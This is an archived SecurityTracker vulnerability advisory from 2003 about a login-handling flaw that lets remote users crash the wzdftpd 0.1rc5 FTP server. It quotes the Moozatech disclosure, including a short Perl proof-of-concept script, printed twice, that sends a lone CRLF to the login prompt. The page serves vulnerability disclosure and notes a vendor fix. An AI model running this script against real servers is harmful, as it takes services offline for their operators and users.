Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
wzdftpd Login Exception Handling Flaw Lets Remote Users Crash the FTP Service
|
|
SecurityTracker Alert ID: 1007793
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Sep 23 2003
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Version(s): 0.1rc5
|
Description: A denial of service vulnerability was reported in the wzdftpd FTP server. A remote user can cause the FTP service to crash.
Moozatech issued an advisory warning that the server does not properly validate user-supplied input during the login process. A
remote user can reportedly send a single CR LF sequence at the login prompt to trigger an exception and crash the FTP service.
A
demonstration exploit script is provided in the Source Message.
|
Impact: A remote user can cause the FTP service to crash.
|
Solution: The vendor has reportedly issued a fix, available via CVS and also in the daily version.
|
Vendor URL: www.wzdftpd.net/ (Links to External Site)
|
Cause: Exception handling error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Underlying OS Comments: Confirmed on Windows 2000; Windows XP
|
Reported By: "Moran Zavdi" <Security@moozatech.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Tue, 23 Sep 2003 08:33:05 -0700
From: "Moran Zavdi" <Security@moozatech.com>
Subject: Moozatech: WZFTPD Denial Of Service
|
------=_NextPart_000_0000_01C381AD.4F864230
Content-Type: text/plain;
charset="windows-1255"
Content-Transfer-Encoding: 8bit
23/09/03
Moozatech Advisory http://www.moozatech.com/mt-23-09-2003.txt
-------------------------------------------------------
Application: wzdftpd FTP Server
Web Site: http://www.wzdftpd.net
Versions: 0.1rc5
Platform: Windows 2000,WindowsXP,UNIX systems might also be affected.
Risk: Remote DOS.
Severity: Medium
Fix Available: Yes
-------------------------------------------------------
1) Introduction
2) Bug
3) The Code
4) Fix
5) About Moozatech
6) Disclaimer
7) FeedBack
===============
1) Introduction
===============
wzdftpd is a ftp server designed to be modular, work under
linux/win32/freebsd/openbsd,
and to be entirely configurable online using SITE commands.
======
2) Bug
======
wzdftpd has an internal check during the login process to verify the input.
however, sending a single CRLF sequence at login will cause an
Unhandled exception at the server.
====================
3) Proof of concept.
====================
#!/usr/bin/perl
# ####################################
# # Proof of concept for #
# # WZDFTPD FTP Server version 0.1rc5 #
# ####################################
# http://www.moozatech.com/mt-23-09-2003.txt
# Usage: perl mooza1.pl [host] [port]
use IO::Socket;
$host = $ARGV[0];
$port = $ARGV[1];
print "\n#####################################\n\n";
print "Proof-Of-Concept for wzdftpd v0.1rc5.\n";
print "this code is for demonstration only.\n";
print "Use it under your own responsebility.\n";
print "\n#####################################\n\n";
if (defined $host && defined $port ) {
} else {
print "Oops, Something is missing.\n";
die "Usage: perl mooza1.pl [host] [port]\n";
print "Connecting to $host:$port... ";
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "tcp", Type=> SOCK_STREAM) or die "Failed, Cant connect?\n";
print "OK\n";
sleep 1;
print "Sending Dos..\n";
sleep 2;
print $socket "\r\n";
$socket->autoflush(1);
sleep 2;
print "we are done here..\n\n";
close($socket);
======
4) Fix
======
the author has confirmed this bug as critical and issued a fix at the CVS
version and
its also availble on the daily version.
==================
5) About Moozatech
==================
Moozatech IT Systems Ltd. (“Moozatech”) is a leading information security
consulting
and project management firm focused on developing
"Secure IT Solutions" which best suit the client's operational needs.
Moozatech devotes time to make a secure computing environment for customers.
=============
6) Disclaimer
=============
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
=============
7) FeedBack
=============
Please send suggestions, updates, and comments to:
Security@moozatech.com
http://www.moozatech.com
-----
Moran Zavdi
Moozatech IT Systems
www.moozatech.com
------=_NextPart_000_0000_01C381AD.4F864230
Content-Type: text/plain;
name="mt-23-09-2003.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="mt-23-09-2003.txt"
23/09/03
Moozatech Advisory http://www.moozatech.com/mt-23-09-2003.txt =09
-------------------------------------------------------
Application: wzdftpd FTP Server=20
Web Site: http://www.wzdftpd.net
Versions: 0.1rc5
Platform: Windows 2000,WindowsXP,UNIX systems might also be affected.
Risk: Remote DOS.
Severity: Medium
Fix Available: Yes
-------------------------------------------------------
1) Introduction
2) Bug
3) The Code
4) Fix
5) About Moozatech
6) Disclaimer
7) FeedBack
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
1) Introduction
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
wzdftpd is a ftp server designed to be modular, work under =
linux/win32/freebsd/openbsd,=20
and to be entirely configurable online using SITE commands.
=3D=3D=3D=3D=3D=3D
2) Bug
=3D=3D=3D=3D=3D=3D
wzdftpd has an internal check during the login process to verify the =
input.
however, sending a single CRLF sequence at login will cause an=20
Unhandled exception at the server.=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
3) Proof of concept.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
#!/usr/bin/perl
#=20
# ####################################
# # Proof of concept for #
# # WZDFTPD FTP Server version 0.1rc5 #=20
# ####################################
# http://www.moozatech.com/mt-23-09-2003.txt
# Usage: perl mooza1.pl [host] [port]
use IO::Socket;
$host =3D $ARGV[0];
$port =3D $ARGV[1];
print "\n#####################################\n\n";
print "Proof-Of-Concept for wzdftpd v0.1rc5.\n";
print "this code is for demonstration only.\n";
print "Use it under your own responsebility.\n";
print "\n#####################################\n\n";
if (defined $host && defined $port ) {
} else {
print "Oops, Something is missing.\n";
die "Usage: perl mooza1.pl [host] [port]\n";
print "Connecting to $host:$port... ";
$socket =3D IO::Socket::INET->new(PeerAddr =3D> $host, PeerPort =3D> =
$port,
Proto =3D> "tcp", Type=3D> SOCK_STREAM) or die "Failed, Cant =
connect?\n";
print "OK\n";
sleep 1;
print "Sending Dos..\n";
sleep 2;
print $socket "\r\n";
$socket->autoflush(1);
sleep 2;
print "we are done here..\n\n";
close($socket);
=3D=3D=3D=3D=3D=3D
4) Fix
=3D=3D=3D=3D=3D=3D
the author has confirmed this bug as critical and issued a fix at the =
CVS version and
its also availble on the daily version.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
5) About Moozatech
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Moozatech IT Systems Ltd. (=93Moozatech=94) is a leading information =
security consulting=20
and project management firm focused on developing=20
"Secure IT Solutions" which best suit the client's operational needs.=20
Moozatech devotes time to make a secure computing environment for =
customers.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
6) Disclaimer
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There =
are
NO warranties with regard to this information. In no event shall the =
author
be liable for any damages whatsoever arising out of or in connection =
with
the use or spread of this information. Any use of this information is at =
the
user's own risk.
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
7) FeedBack
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Please send suggestions, updates, and comments to:
Security@moozatech.com
http://www.moozatech.com
------=_NextPart_000_0000_01C381AD.4F864230--
|
|
Go to the Top of This SecurityTracker Archive Page
|
